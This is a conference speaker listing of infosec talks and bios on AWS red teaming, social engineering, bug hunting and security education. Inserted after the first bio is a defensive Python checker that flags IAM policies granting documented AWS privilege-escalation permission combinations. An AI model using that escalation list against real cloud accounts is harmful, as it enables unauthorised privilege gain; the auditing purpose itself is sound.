Carlos Polop
Talk Description:
"Red Team 2.0: Adapting Traditional Red Team to Cloud (AWS) Red Team" is a talk focused on the evolution of Red Teaming and its adaptation to cloud computing, specifically Amazon Web Services (AWS). As organizations increasingly move their operations to the cloud and adopt architectures such as zero trust networks, the need for Red Teaming to address security challenges unique to the cloud has grown. This talk will explore the challenges that come with adapting traditional Red Teaming to a Cloud (AWS) environment, and provide insights on how to effectively conduct Red Teaming exercises in the cloud. Participants will learn about the key differences between traditional Red Teaming and AWS Red Teaming, and the unique considerations and tools that come with the latter. The talk will cover best practices and techniques for conducting AWS Red Team exercises, such as exploiting cloud misconfigurations, testing security measures, evaluating the effectiveness of cloud-based security systems by doing live demos and showing less known techniques to compromise, escalate privileges and post exploit an AWS environment. Attendees will leave the talk with a deep understanding of the importance of Red Teaming in the cloud environment, the specific challenges posed by AWS, and practical techniques and tools for conducting successful AWS Red Team exercises. This talk is ideal for security professionals, cloud engineers, and anyone interested in gaining a better understanding of Red Teaming in the cloud.
Speaker Bio:
Carlos has a degree in Telecommunications Engineering with a Master in Cybersecurity and is currently working as Team Leader of Web, Mobile & Cloud Penetration Testing at Halborn.
He also has several relevant certifications in the field of cybersecurity such as OSCP, OSWE, CRTP, eMAPT, eWPTXv2…
As a CTF player, he has won some international CTF competitions; he was captain of the Spanish national team in ECSC2021 and part of the winning European team in the ICSC2022.
Since he started learning cybersecurity he has tried to share his knowledge with the infosec community by publishing open source tools such as https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite and writing free hacking books that anyone can consult at https://book.hacktricks.xyz/ and https://cloud.hacktricks.xyz/.
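The privilege-escalation techniques mentioned in the talk description above turn on which permission combinations an IAM policy grants. As an added example, not code from the talk or from the speaker's tools, here is an offline Python check that evaluates a policy document against a subset of the publicly documented IAM escalation paths. The three policy documents are constructed, and the check deliberately ignores Resource, Condition and NotAction, so a hit means "verify this", not "exploitable":

```python
"""Offline check of an IAM policy document for permission combinations that are
publicly documented as privilege-escalation paths. Added example; the policies
below are constructed and the path list is a subset, not an exhaustive catalogue."""
import fnmatch
import json

# (label, required actions). Every action in the set must be effectively allowed.
PRIVESC_PATHS = [
    ("iam:CreatePolicyVersion on an attached policy", {"iam:CreatePolicyVersion"}),
    ("iam:AttachUserPolicy to self", {"iam:AttachUserPolicy"}),
    ("iam:PutUserPolicy inline on self", {"iam:PutUserPolicy"}),
    ("iam:CreateAccessKey for a more privileged user", {"iam:CreateAccessKey"}),
    ("iam:AddUserToGroup into a privileged group", {"iam:AddUserToGroup"}),
    ("iam:PassRole + Lambda create/invoke",
     {"iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"}),
    ("iam:PassRole + ec2:RunInstances", {"iam:PassRole", "ec2:RunInstances"}),
    ("iam:UpdateAssumeRolePolicy + sts:AssumeRole", {"iam:UpdateAssumeRolePolicy", "sts:AssumeRole"}),
]


def _as_list(value):
    # IAM accepts a single string anywhere a list is allowed (Statement, Action, ...).
    return value if isinstance(value, list) else [value]


def _action_matches(pattern, action):
    # IAM action matching is case-insensitive and supports the * and ? wildcards.
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def allowed_actions(policy, candidates):
    """Return the subset of `candidates` the policy effectively allows: matched by
    some Allow statement and not matched by any Deny statement. Resource ARNs and
    Conditions are ignored, so the result is an upper bound on what is granted."""
    allowed, denied = set(), set()
    for stmt in _as_list(policy["Statement"]):
        if "NotAction" in stmt:
            raise ValueError("NotAction statements are not evaluated by this check")
        patterns = _as_list(stmt.get("Action", []))
        bucket = allowed if stmt["Effect"] == "Allow" else denied
        for action in candidates:
            if any(_action_matches(p, action) for p in patterns):
                bucket.add(action)
    return allowed - denied


def privesc_paths(policy):
    """Labels of the escalation paths whose required actions are all allowed."""
    wanted = set().union(*(actions for _, actions in PRIVESC_PATHS))
    have = allowed_actions(policy, wanted)
    return [label for label, actions in PRIVESC_PATHS if actions <= have]


# Constructed policies (not taken from any real account).
DEVELOPER_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": ["lambda:*", "iam:PassRole", "iam:Get*", "iam:List*"], "Resource": "*"},
    {"Effect": "Allow", "Action": "ec2:Describe*", "Resource": "*"},
    {"Effect": "Deny", "Action": "lambda:DeleteFunction", "Resource": "*"}
  ]
}""")

ADMIN_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": {"Effect": "Allow", "Action": "*", "Resource": "*"}
}""")

# Same developer, with the chain broken: no PassRole and no CreateFunction.
SCOPED_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow",
     "Action": ["lambda:InvokeFunction", "lambda:UpdateFunctionCode", "lambda:Get*", "lambda:List*",
                "iam:Get*", "iam:List*"],
     "Resource": "*"}
  ]
}""")

if __name__ == "__main__":
    for label, policy in [("developer", DEVELOPER_POLICY), ("admin", ADMIN_POLICY), ("scoped", SCOPED_POLICY)]:
        print(label, privesc_paths(policy))
```

On the developer policy the check reports only the Lambda path: `lambda:*` supplies CreateFunction and InvokeFunction, `iam:PassRole` supplies the role hand-off, and the Deny on DeleteFunction changes nothing. The scoped policy breaks the chain by dropping PassRole and CreateFunction; the other common fix, restricting `iam:PassRole` to specific role ARNs with a `Resource` list and an `iam:PassedToService` condition, is exactly what this check does not evaluate, so a hit still needs a look at the statement's Resource and Condition before it is called a finding.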
When Red Meets Blue: A Love-Hate Story of Cybersecurity
Dominic Cunningham
Talk Description:
In the world of cybersecurity, red teams are tasked with identifying vulnerabilities and potential threats to a company's security, while blue teams are responsible for defending against these attacks. While they may seem like natural adversaries, the reality is that these two teams can learn from each other. In this talk, we will explore the relationship between red and blue teams through the lens of a "love-hate" story. While red teams may be seen as the "bad guys" trying to break into the system, the truth is that they have a crucial role to play in identifying weaknesses that actual attackers could exploit. Similarly, blue teams may be seen as overbearing and inflexible, but they are responsible for implementing the necessary defenses to protect against these attacks.
While red teams are responsible for attacking and identifying vulnerabilities, blue teams defend against these attacks. However, a major challenge in this collaboration is the skill gap between the two teams. Red teams may have more knowledge of threat intelligence and tactics, techniques, and procedures (TTPs), while blue teams may have more expertise in defensive strategies and network operations. One way to bridge this gap is by sharing threat intelligence knowledge and domain-specific expertise. By understanding the TTPs used by real-world attackers and tooling, blue teams can better prepare and defend against potential threats. Additionally, knowledge of blue team methodology and patterns can benefit blue teams. This knowledge of both teams' methodology and shortcomings can aid in developing a better cybersecurity dynamic and strengthen skill gaps.
Speaker Bio:
Dominic "Cryillic" Cunningham serves as a Red Team Content Engineer at TryHackMe and a Course Instructor at BC Security. He is currently pursuing a Computing Security degree at the Rochester Institute of Technology. Dominic specializes in general adversary emulation and offensive operations, with a focus on researching and documenting evasion techniques, Windows Internals, and Active Directory. He has delivered presentations and instruction at conferences such as Black Hat and DEF CON. Dominic's extensive research work has been featured on https://www.tryhackme.com, where he has also created and published numerous CTF boxes and enterprise-level ranges.
The Rebol Yell
Oscar Minks
Talk Description:
A deep dive into a real-world observation that analyzes how attackers are utilizing COTS applications for C2 functionality. The talk will deep dive into the kill-chain of this attack from initial target through payload delivery. We will also explore other persistence mechanisms and lateral movement techniques. More importantly, we will discuss how to defend and mitigate against such attacks.
Speaker Bio:
With nearly two decades of experience in the industry, Oscar serves as CTO at FRSecure where he manages our in-house team of experts spanning red teaming, blue teaming, and consulting operations. Aside from playing a crucial role in FRSecure’s leadership, Oscar is an experienced speaker and contributor to the information security industry as a whole. He regularly gives talks at information security conferences and hosts two different podcasts, The Hackle Box (monthly) and The Unsecurity Podcast (weekly), to inform listeners of current events and best practices from both a technical and a business standpoint. To Oscar, our focus on fixing a broken industry means leading by example and showing his peers the importance of doing things correctly, not just conveniently. “In an industry clouded with unnecessary tools, acronyms, and easy button solutions, we strive to do things the right way. We aim not only to serve our clients but set an example for our peers in the security industry too.” When Oscar isn’t helping folks with security, you might find him strumming a guitar or fishing.
Hackers in Space!!! (Towel, duct tape & a red hose! Anything's a tool if you hack it hard enough.)
Jayson E. Street
Talk Description:
“I don't care about what anything was designed to do, I care about what it can do.”
~ Gene Kranz (aerospace engineer - NASA's second Chief Flight Director - Hacker)
In everyday life we tend to take for granted what roles a device is used for, never considering what other ways that same device can be utilized to help or harm.
Another quote I love is this one
“Any sufficiently advanced technology is indistinguishable from magic”
~ Arthur C. Clarke
It’s because it got me thinking to the point of where I adapted it as I see it relating to what I do.
“Any sufficiently common technology is indistinguishable from an attack tool”
~ Jayson E. Street
Having successfully robbed banks, organizations & governments all over the world, one of the key findings is how so many overlook potentially dangerous devices & occurrences since they appear to be everyday items & events.
In this talk we will not just go over the devices I’ve used successfully to compromise companies globally. I’ll show that with proper understanding and education the risk of these attacks can be minimized, and how this process of education can be used for more than unknown devices on a network.
I will also show a demo of a novel way of using a drone in a Social Engineering attack to get the employees to bring in and execute the payloads without me ever having to step foot on the property or even ask them to.
Speaker Bio:
A "notorious hacker" by FOX25 Boston, "World Class Hacker" by National Geographic Breakthrough Series and described as a "paunchy hacker" by Rolling Stone Magazine. He however prefers if people refer to him simply as a Hacker, Helper & Human.
The Chief Chaos Officer of Truesec, a global cybersecurity solutions provider. The author of the "Dissecting the hack" series (which is currently required reading at 5 colleges in 3 countries that he knows of). Also the DEF CON Groups Global Ambassador. He's spoken at DEF CON, DEF CON China, GRRCon, DerbyCon and several other 'CONs & colleges on a variety of Information Security subjects. He was also a guest lecturer for the Beijing Institute of Technology for 10 years.
He loves to explore the world & networks as much as he can. He has successfully robbed banks, hotels, government facilities, biochemical companies, etc. on five continents (only successfully robbing the wrong bank in Lebanon once; all the others he was supposed to)!
*He is a highly carbonated speaker who has partaken of Pizza from Bulgaria to Brazil & China to The Canary Islands. He does not expect anybody to still be reading this far but if they are please note he was proud to be chosen as one of Time's persons of the year for 2006.
TBD
Thomas 'dawgyg' DeVoss
Talk Description:
TBD
Speaker Bio:
dawgyg is a Bug Bounty Hunter, Reformed Blackhat and Head of AppSec at Braze.
He has been awarded over $2 million in bug bounty payouts on HackerOne's platform and was named their 2020 Most Valuable Hacker.
Wall of Fame: Yahoo, Mail.Ru, Mapbox, Imgur, GM, Adobe, AOL, Zynga, Viadeo, Uber, Microsoft, Netflix
CVEs:
CVE-2018-1042
CVE-2017-0913
CVE-2017-0912
Wall of Fame credits:
https://contact.security.aol.com/hof/
https://www.zynga.com/security/whitehats
http://www.viadeo.com/aide/security/
https://www.maxcdn.com/security/
https://hackerone.com/dawgyg/thanks
Other info:
https://hackerone.com/dawgyg
https://bugcrowd.com/dawgyg
http://vulnerability-lab.com/show.php?user=Tommy%20DeVoss
https://packetstormsecurity.com/files/134073/Virgin-Mobile-Cross-Site-Scripting.html
https://moodle.org/mod/forum/discuss.php?d=364381#p1469490
The Bug Hunters Methodology: Application Analysis v1.8
Jason Haddix
Talk Description:
The Bug Hunter's Methodology (TBHM) is a series of talks done by Jason exposing new advents in tools, tactics, and procedures used in bug hunting. TBHM Application Analysis dives into the question: "What do I do after recon?" In this talk, Jason will explore the mindset of approaching a hardened web target and how he breaks up finding vulnerabilities across its stack. Many talks can teach you how to exploit a certain vulnerability; fewer can teach you how to find out where they are in complex pieces of software. TBHM Application Analysis also covers Jason's personal tips/tricks in the areas of automation, content discovery, JavaScript analysis, spidering, parameter analysis, functionality "heatmapping", and more. Version 1.8 adds more vulnerability specificity, web fuzzing techniques, and context about how to interpret responses when fuzzing web applications.
Speaker Bio:
Jason Haddix is the CISO and “Hacker in Charge” at BuddoBot, a world-class adversary emulation consultancy. He’s had a distinguished 15-year career in cybersecurity, previously serving as the CISO of Ubisoft, Head of Trust/Security/Operations at Bugcrowd, Director of Penetration Testing at HP, and Lead Penetration Tester at Redspin. He has also held positions doing mobile penetration testing, network/infrastructure security assessments, and static analysis. Jason is a hacker and bug hunter to the core, and he is ranked 51st all-time on Bugcrowd’s leaderboards. Currently, he specializes in recon and web application analysis. Jason has also authored many talks on offensive security methodology, including speaking at cons such as DEF CON, Black Hat, OWASP, RSA, Nullcon, SANS, IANS, BruCon, Toorcon, and many more. Jason currently lives in Colorado with his wife and three children.
What Security Teams Can Learn From Looking at Aviation Safety, from an AF pilot and Safety Officer Turned Cyberwarfare Officer
Joshua Mason
Talk Description:
In order to reduce incidents and maintain air dominance, the United States Air Force aviation community has developed a culture of continuous development through focused, purposeful, and structured feedback.
By utilizing the tactics, techniques, and practices developed by Air Force aviators, the security community can better utilize lessons learned through failure and success and improve from engagement to engagement or incident to incident.
Josh Mason will introduce the mindset, methodology, and framework for implementing this practice in your organization.
Speaker Bio:
Josh is a cybersecurity professional who transitioned from being a military cargo pilot to being a cyberwarfare officer in the US Air Force. Josh has since taught at the US Air Force Special Operations School, the DoD Cyber Crime Center's Cyber Training Academy, and the veteran training organization WithYouWithMe. Josh built out the latest version of Penetration Testing Student and the eLearnSecurity Junior Penetration Tester exam alongside the team at INE. Josh was also a sales engineer for SimSpace, leading their partner enablement program. Josh has founded several non-profit organizations aimed at helping individuals start their careers in cybersecurity. Josh has led career workshops and spoken at Wild West Hackin' Fest. Currently, Josh is an instructor at Neuvik Solutions, providing courses, engagement management, and advanced assessments to clients.
Researching the Researchers: Using Their Work to Secure Aviation and Aerospace
Lost0x01
Talk Description:
This shallow dive into some of the research being done to identify vulnerabilities in the Aviation and Aerospace industry will take a look at a few researchers, some of their research and how we turn that research into actionable plans to improve security. We will cover topics including ADS-B spoofing, EFB tampering, TCAS, ILS and more, and how that research can be used to help secure the next generation of Avionics technology.
Speaker Bio:
Lost is a Senior Intelligence Analyst at a large aerospace organization with a focus on Malware and APTs. His other roles within the organization include Threat Hunting, Product Security Liaison and dabbling in Detection Engineering. Prior to the 2+ years in his current role he spent 3 years working as a contract incident responder covering multiple industries and organizations. Before entering the security field, Lost was a Master Mechanic and a Chef in several Atlanta area restaurants. Outside of his current role Lost enjoys his time being a dad, sailing as often as he can, tattoos, cooking, and helping people break into the industry through mentoring students and helping with Aviation themed Cyber challenges and CTFs.
CVE EDU
Robert "LTNBOB" Theisen
Talk Description:
In this talk led by Robert "LTNBOB" Theisen, the state of IT & Cybersecurity education is discussed as if it was a vulnerability with a CVE assigned. He will be sharing his experience on what works and does not work in college environments, private industry and small communities. This talk is for all skill levels and will assist attendees in identifying the best ways to learn in this field. Solutions will be proposed to assist learners in demanding a higher quality education focused on developing relevant skills in Cybersecurity. The ultimate goal is to encourage others to become part of the movement to reform IT & Cybersecurity education.
Attendees can expect to gain the following from this talk:
- A Unique Perspective on IT & Cybersecurity education
- Methods and strategies to identify the best educational options (formal & informal) for your career
- Home Lab Tips & Strategies
- How to become an Educator that can lead mentored learning communities
- How to hold educational institutions accountable for the quality of education
- TTPs for IT & Cybersecurity teachers on how to best prepare students
- Influencing change
Speaker Bio:
Robert "LTNBOB" Theisen is fascinated by technology as a tool to empower humanity to do more good in the world than bad. His calling is to engage, enlighten and empower others to be all they can be. Learning is part of his daily regimen, and he believes learning is the single most empowering thing one can do. Education is not just limited to organizations that grant degrees. We live in an era where we can start learning just about anything with one keyword search. High quality guidance from a teacher or mentor can accelerate the learning process.
He loves learning but loves to empower others even more. He never takes off his IT/infosec professional hat and never will so long as he is preparing others to succeed through mastering the various tactics, techniques, procedures and tools we have at our disposal. None of his accomplishments would be possible without great mentors, friends, family, the Internet and God.
He is always open to learning about new opportunities, especially if the outcome leads to better lives for those that choose to use what he teaches.
Accomplishments & Focus:
- Revitalizing college IT programs
- Developing IT & Cybersecurity curriculum for community colleges
- Assisted Hack The Box in developing modules in the Penetration Tester path on Hack The Box Academy
- Actively assisting thousands of learners with breaking into IT & Cybersecurity
- Creating beginner friendly IT & Cybersecurity content for the ltnlabs YouTube channel
- Partnering with learner focused institutions & communities to improve the quality of education
TBD
Tiffany M. Snyder
Talk Description:
TBD
Speaker Bio:
Tiffany joined NASA in 2018 with over 20 years of information technology and cybersecurity experience in Air Force Combat Command, Air Force Space Command, and as a Special Agent with the Department of Defense. Tiffany holds a Master of Science degree in Digital Forensics from the University of Central Florida, a Bachelor of Science degree in Earth Science from SUNY Buffalo State College, and various cybersecurity and IT certifications. At NASA, Tiffany first served as a Project Manager for the RISCS project on the Cybersecurity Infrastructure team. She then served as the Deputy Chief Information Security Officer at Kennedy Space Center beginning in 2019, where she led the Assessment and Authorization team. Currently Tiffany is the Deputy Chief of the Cybersecurity Mission Integration Office within the Cybersecurity & Privacy Division, Office of the Chief Information Security Officer, for NASA.
In her spare time, Tiffany enjoys paddleboarding, snorkeling, and surfing with her family, gardening, and tending to her ‘zoo’ of pets.
Me Time: It's OK to Take a Break from It All
Don Donzal AKA @ethicalhacker
Talk Description:
Who am I? Why Am I here? What kind of impact can I make on the world, my community, my family, or even myself in the time remaining on this isolated blue marble? Does it even matter? Am I just being selfish in thinking this way when there are bills to pay, mouths to feed and a world in flux? For argument’s sake, let’s just assume that you do matter and thinking about such questions is not only unselfish but healthy. This then leads to other questions… What do I want? What should I avoid? What makes me happy?
In this very personal talk, Don gets brutally honest about himself and life in the infosec community. He explores the ideas behind what really is a sabbatical, should you take the plunge, what to do during one, best ways to take advantage of your time and lack of income, preparing beforehand and much more. Don doesn’t claim to have all of the answers and maybe not even any. But if life truly is about the journey and not the destination, then this talk will help us all, speaker and audience alike, probe the depths of ourselves and encourage your own journeys. And maybe together we’ll find there’s more to all of this than the number 42.
Speaker Bio:
Father, executive, community builder, passionate technologist and life-long learner who blames his parents for his entrepreneurial tendencies. Don is proud that his son graduated HS early to fulfill his dream of becoming a United States Marine and that his daughter is becoming a strong, determined woman who loves writing even more than he does. Being the founder of The Ethical Hacker Network (EH-Net) Online Magazine and Community (acquired by eLearnSecurity) and ChicagoCon as well as having worked for large and small organizations in both the private and public sectors, Don has been part of the hacker/infosec/cybersec community for decades.
Robbing A Bank Over The Phone - How An Expert Social Engineer Can Convince You To Do Anything
Joshua Crumbaugh
Talk Description:
In this intense talk, Joshua brings the audience along for the ride on one of the most advanced social engineering attacks he's ever executed - robbing a bank over the phone.
This keynote address is an engaging and entertaining talk about the experiences of an expert social engineer. Audiences will be on the edge of their seats as they listen to real audio of Joshua convincing the Vice President of a bank to give up full access to his computer and eventually the entire facility. Attendees will walk away with a better understanding of how hackers/con men can gain access to your corporations and learn how to apply lessons learned in their professional and personal lives; all while hearing one of the most entertaining accounts from one of the best social engineers in the industry.
Keynote Attendees will learn:
● How a hacker will exploit employees to gain access to restricted areas; both offline and online.
● How to identify social engineering attacks
● The importance of cyber security awareness and training in the workplace
● Best practices for preventing common hacker attacks like Phishing emails, etc.
● Actionable items for mitigating potential risk for a cyber security attack
Speaker Bio:
Joshua Crumbaugh is an internationally renowned cybersecurity expert, published author and keynote speaker. With decades of experience in ethical hacking and social engineering, Joshua gained worldwide recognition for his ability to infiltrate even the most secure networks as a penetration tester. His expertise in this field has led him to found PhishFirewall, where he serves as CEO. Through his company's work and his own written contributions to cybersecurity, Joshua is dedicated to helping others understand the ever-evolving world of cybersecurity and how to stay safe in the digital age.
Breaking Barriers: Empowering Women in Cybersecurity and STEM
Samantha Bolet
Vanessa Morales
Angela Hill
Valentina Ruiz
Talk Description:
In the male-dominated fields of cybersecurity and STEM, women, and Latinas specifically, face unique challenges and barriers that can affect their success and advancement. However, these women possess valuable skills, perspectives, and experiences that can enrich and strengthen these fields. In this talk, we will explore the obstacles and opportunities that women encounter in cybersecurity and STEM, and discuss practical strategies for supporting and promoting their participation and leadership.
Through this talk, we will demonstrate how we can build a more equitable and dynamic future for cybersecurity and STEM and highlight these topics through a live panel with female Latina cybersecurity professionals and leaders from NBCUniversal.
Speaker Bio:
Samantha Bolet
Samantha Bolet is a technology leader, diversity advocate, and community builder who is passionate about empowering Latinas and underrepresented groups in tech.
Based out of NYC, Samantha Bolet is the Cofounder and Vice President of the non-profit organization Latinas in Cyber, which dedicates itself to promoting the presence and career success of Latinas within the cybersecurity industry. Samantha, alongside the LAIC executive team, focuses on program development, digital strategy, brand storytelling, and the development and execution of the LAIC Mentorship Academy.
Samantha is currently a Senior Privacy Program Manager in tech and previously, was a Senior Associate in the Cybersecurity Practice at KPMG. She holds a Masters of Science in Technology Management and Information Systems and a Bachelors of Arts in Political Science and Spanish, both from the University of Illinois at Urbana Champaign. She also holds a Data Privacy and Technology Certificate from Harvard Business School and the IAPP CIPM.
Vanessa Morales
Vanessa decided to enlist in the US Army Reserves at a young age and after coming back from nine months of training and knowing she wanted to pursue a STEM major, she started to pursue a degree in Chemical Engineering. Towards the end of her degree, she started her family with her husband and decided to switch her career path and start teaching herself how to code. With the mentality of becoming a software engineer, she decided why not, and dived right into Vanilla JS, Python, C++, and more. Although coding was fun, she was curious and purchased the Linux Basics for Hackers book, and a light bulb was lit. Cyber Security was her calling. Still and always willing to be a student, she is always on the roll to learn new topics and information about penetration testing, red teaming, and offensive security.
Vanessa is now a Security Architecture Analyst based on the East Coast and the Executive Director for the non-profit Latinas In Cyber (LAIC). Passionate for the success of beginners and diversifying the cybersecurity industry, Vanessa works, alongside the LAIC executive team, to create a community and opportunities to help assist those breaking into the field.
Angela Hill
Angela Hill is a security ‘veteran’ and executive leader with expertise in national security, intelligence, cloud, security, and program management. She has demonstrated herself as an entrepreneur, trusted executive advisor, and cybersecurity industry thought leader. Today, she supports the world's #1 cybersecurity company and is an online contributor on cyber topics. Angela aims to foster greater inclusion of underrepresented populations within the cybersecurity industry and is the president and co-founder of Latinas in Cyber (LAIC).
Valentina Ruiz
Valentina Ruiz recently graduated from the University of South Florida this past December with a Bachelors in Business Analytics and Information Systems. She recently completed her internship with Latinas in Cyber as a Program Manager, where she’s had the amazing opportunity to expand her management and cyber skills by assisting in creating the 2023 Mentorship Academy.
With cyber knowledge and management experience, she’s currently pursuing her Certified in Cybersecurity certificate from ISC2 and a Governance, Risk, & Compliance Certificate, as well as looking for an entry level role that will expand her skills. Her experience interning as a Program Manager for a cyber nonprofit has only reinforced her desire to merge her cyber security skills and knowledge with her passion for the cyber security field, specifically data privacy and GRC.